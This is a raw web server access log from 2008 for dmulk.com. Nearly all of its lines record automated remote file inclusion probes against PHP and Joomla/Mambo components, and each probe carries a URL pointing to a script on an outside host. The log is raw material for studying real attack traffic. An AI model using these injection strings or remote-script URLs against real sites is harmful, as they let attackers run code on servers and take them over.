79.189.166.26 - - [29/Apr/2008:09:00:19 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://togot.us/mini.htm? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
86.109.167.35 - - [29/Apr/2008:09:00:26 -0700] "GET /logs/access_080214.log/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.167.35 - - [29/Apr/2008:09:00:30 -0700] "GET /////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.167.35 - - [29/Apr/2008:09:00:32 -0700] "GET /logs/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 200 45276 "-" "libwww-perl/5.79" "www.dmulk.com"
89.255.3.207 - - [29/Apr/2008:09:00:35 -0700] "GET /logs/access_080218.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://163.21.14.134/appserv/iyes.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.255.3.207 - - [29/Apr/2008:09:00:36 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://163.21.14.134/appserv/iyes.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.255.3.207 - - [29/Apr/2008:09:00:36 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://163.21.14.134/appserv/iyes.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.235.56.178 - - [29/Apr/2008:09:01:01 -0700] "GET /logs/access_080223.log/errors.php?error=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.235.56.178 - - [29/Apr/2008:09:01:01 -0700] "GET /errors.php?error=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.235.56.178 - - [29/Apr/2008:09:01:01 -0700] "GET /logs/errors.php?error=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
58.26.137.64 - - [29/Apr/2008:09:01:07 -0700] "GET /logs/access_080127.log/appserv/main.php?appserv_root=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
87.106.39.89 - - [29/Apr/2008:09:01:12 -0700] "GET /logs/access_080223.log/errors.php?error=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.39.89 - - [29/Apr/2008:09:01:13 -0700] "GET /errors.php?error=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.39.89 - - [29/Apr/2008:09:01:13 -0700] "GET /logs/errors.php?error=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:09:01:14 -0700] "GET /logs/access_080223.log/errors.php?error=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:09:01:15 -0700] "GET /errors.php?error=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:09:01:15 -0700] "GET /logs/errors.php?error=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:09:01:15 -0700] "GET /logs/access_080223.log/errors.php?error=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:09:01:15 -0700] "GET /errors.php?error=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:09:01:15 -0700] "GET /logs/errors.php?error=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.235.56.178 - - [29/Apr/2008:09:01:33 -0700] "GET /logs/access_080117.log/errors.php?error=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.106.39.89 - - [29/Apr/2008:09:01:37 -0700] "GET /logs/access_080117.log/errors.php?error=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:09:01:47 -0700] "GET /logs/access_080117.log/errors.php?error=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
210.127.253.161 - - [29/Apr/2008:09:02:43 -0700] "GET /logs/access_080224.log/errors.php?error=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.40.12.40 - - [29/Apr/2008:09:03:19 -0700] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
66.40.12.40 - - [29/Apr/2008:09:03:19 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
87.117.252.170 - - [29/Apr/2008:09:03:29 -0700] "GET /logs/access.log//index.php?option=com_custompages&cpage=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
196.7.147.171 - - [29/Apr/2008:09:03:29 -0700] "GET /logs/index.php?option=com_acajoom&Itemid=&mosConfig_absolute_path=http://www.welkominfo.co.za/lapa/bo.do? HTTP/1.0" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
196.7.147.171 - - [29/Apr/2008:09:03:33 -0700] "GET /index.php?option=com_acajoom&Itemid=&mosConfig_absolute_path=http://www.welkominfo.co.za/lapa/bo.do? HTTP/1.0" 200 11590 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
67.19.51.194 - - [29/Apr/2008:09:03:41 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:09:03:46 -0700] "GET /logs/access_080304.log//newspublish/include.php?path%5Bdocroot%5D=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:09:03:46 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:09:03:47 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:09:03:50 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:09:03:53 -0700] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:09:03:53 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
85.25.145.85 - - [29/Apr/2008:09:03:54 -0700] "GET /logs//includes/functions_editor.php?includes=http://fadhilla.com/program/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
85.25.145.85 - - [29/Apr/2008:09:03:54 -0700] "GET //includes/functions_editor.php?includes=http://fadhilla.com/program/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
67.19.51.194 - - [29/Apr/2008:09:03:55 -0700] "GET /logs/access_080304.log//newspublish/include.php?path%5Bdocroot%5D=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [29/Apr/2008:09:03:55 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [29/Apr/2008:09:03:55 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.82.112.61 - - [29/Apr/2008:09:03:59 -0700] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
65.82.112.61 - - [29/Apr/2008:09:03:59 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
67.19.51.194 - - [29/Apr/2008:09:04:08 -0700] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
67.19.51.194 - - [29/Apr/2008:09:04:08 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
80.219.159.57 - - [29/Apr/2008:09:04:25 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.219.159.57 - - [29/Apr/2008:09:04:25 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.40.12.40 - - [29/Apr/2008:09:04:29 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.219.101.32 - - [29/Apr/2008:09:04:29 -0700] "GET //webeditor.php?id=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
66.219.101.32 - - [29/Apr/2008:09:04:29 -0700] "GET /logs//webeditor.php?id=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
66.40.12.40 - - [29/Apr/2008:09:04:42 -0700] "GET /logs/access_080304.log//newspublish/include.php?path%5Bdocroot%5D=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.40.12.40 - - [29/Apr/2008:09:04:42 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.40.12.40 - - [29/Apr/2008:09:04:42 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:09:04:51 -0700] "GET /logs/access_080312.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:09:04:51 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:09:04:51 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.219.101.32 - - [29/Apr/2008:09:04:54 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.freewebtown.com/amir5/idat.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "dmulk.com"
66.219.101.32 - - [29/Apr/2008:09:04:54 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.freewebtown.com/amir5/idat.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "dmulk.com"
70.91.145.249 - - [29/Apr/2008:09:05:06 -0700] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.0" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
70.91.145.249 - - [29/Apr/2008:09:05:06 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.0" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.235.56.178 - - [29/Apr/2008:09:05:08 -0700] "GET /logs/access_080312.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.235.56.178 - - [29/Apr/2008:09:05:08 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.235.56.178 - - [29/Apr/2008:09:05:08 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
70.91.145.249 - - [29/Apr/2008:09:05:10 -0700] "GET /logs/access_080304.log//newspublish/include.php?path%5Bdocroot%5D=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.91.145.249 - - [29/Apr/2008:09:05:10 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.91.145.249 - - [29/Apr/2008:09:05:11 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
86.109.167.35 - - [29/Apr/2008:09:05:23 -0700] "GET /logs/access_080214.log/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.167.35 - - [29/Apr/2008:09:05:28 -0700] "GET /////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.167.35 - - [29/Apr/2008:09:05:29 -0700] "GET /logs/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 200 45276 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:09:05:37 -0700] "GET /logs/access_080312.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:09:05:37 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:09:05:37 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
210.127.253.161 - - [29/Apr/2008:09:05:54 -0700] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.ttb.org.tr/avian/templates/sistem.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
200.254.243.74 - - [29/Apr/2008:09:06:17 -0700] "GET /logs/home.php?content=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.254.243.74 - - [29/Apr/2008:09:06:18 -0700] "GET /home.php?content=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.235.56.178 - - [29/Apr/2008:09:06:37 -0700] "GET /logs/errors.php?error=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.235.56.178 - - [29/Apr/2008:09:06:37 -0700] "GET /errors.php?error=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.195.37.121 - - [29/Apr/2008:09:06:44 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
87.106.39.89 - - [29/Apr/2008:09:06:47 -0700] "GET /logs/errors.php?error=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.39.89 - - [29/Apr/2008:09:06:48 -0700] "GET /errors.php?error=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.195.37.121 - - [29/Apr/2008:09:06:52 -0700] "GET /blog/index.php/2008/ HTTP/1.0" 200 10613 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
67.195.37.121 - - [29/Apr/2008:09:06:52 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.0" 200 9037 "http://dmulk.com/blog/2008/" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
72.29.95.45 - - [29/Apr/2008:09:06:54 -0700] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.87.154.155 - - [29/Apr/2008:09:07:05 -0700] "GET /logs/access_080201.log//tools/send_reminders.php?noSet=0&includedir=http://www.iammypersonalbest.com/oneadmin/linksdir/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.87.154.155 - - [29/Apr/2008:09:07:06 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.iammypersonalbest.com/oneadmin/linksdir/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.87.154.155 - - [29/Apr/2008:09:07:06 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.iammypersonalbest.com/oneadmin/linksdir/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.91.145.249 - - [29/Apr/2008:09:07:12 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.56.80 - - [29/Apr/2008:09:07:19 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://kukekaw.fileave.com/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.219.101.32 - - [29/Apr/2008:09:07:45 -0700] "GET //webeditor.php?id=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "dmulk.com"
66.219.101.32 - - [29/Apr/2008:09:07:45 -0700] "GET /logs//webeditor.php?id=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "dmulk.com"
203.22.204.188 - - [29/Apr/2008:09:07:50 -0700] "GET /logs/access_080219.log/main.php?site=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.22.204.188 - - [29/Apr/2008:09:07:50 -0700] "GET /main.php?site=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.22.204.188 - - [29/Apr/2008:09:07:50 -0700] "GET /logs/main.php?site=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.115.110.89 - - [29/Apr/2008:09:07:58 -0700] "GET /logs/access_080228.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.232.122.239 - - [29/Apr/2008:09:08:00 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
72.232.122.239 - - [29/Apr/2008:09:08:00 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
211.115.110.89 - - [29/Apr/2008:09:08:02 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.65" "www.dmulk.com"
211.115.110.89 - - [29/Apr/2008:09:08:02 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.19.51.194 - - [29/Apr/2008:09:08:13 -0700] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.19.182.247 - - [29/Apr/2008:09:08:18 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.lopesgarcia.pt/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
84.19.182.247 - - [29/Apr/2008:09:08:18 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.lopesgarcia.pt/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
66.40.12.40 - - [29/Apr/2008:09:08:19 -0700] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.86.49.98 - - [29/Apr/2008:09:08:21 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
70.86.49.98 - - [29/Apr/2008:09:08:23 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
209.160.40.157 - - [29/Apr/2008:09:08:38 -0700] "GET /logs/access_080308.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://therealtypro.net/wp-admin/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.160.40.157 - - [29/Apr/2008:09:08:38 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://therealtypro.net/wp-admin/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.160.40.157 - - [29/Apr/2008:09:08:38 -0700] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://therealtypro.net/wp-admin/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.106.39.89 - - [29/Apr/2008:09:08:43 -0700] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.39.89 - - [29/Apr/2008:09:08:44 -0700] "GET //bemarket/postscript/postscript.php?p_mode=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.219.159.57 - - [29/Apr/2008:09:08:49 -0700] "GET /logs/access_080220.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.240.231.154 - - [29/Apr/2008:09:09:02 -0700] "GET //index.php?seccion=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
209.160.40.157 - - [29/Apr/2008:09:09:06 -0700] "GET /logs/access_080329.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://therealtypro.net/wp-admin/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.91.145.249 - - [29/Apr/2008:09:09:06 -0700] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.232.122.239 - - [29/Apr/2008:09:09:11 -0700] "GET //webeditor.php?id=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
72.232.122.239 - - [29/Apr/2008:09:09:11 -0700] "GET /logs//webeditor.php?id=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
72.232.122.239 - - [29/Apr/2008:09:09:14 -0700] "GET //webeditor.php?id=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
72.232.122.239 - - [29/Apr/2008:09:09:14 -0700] "GET /logs//webeditor.php?id=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
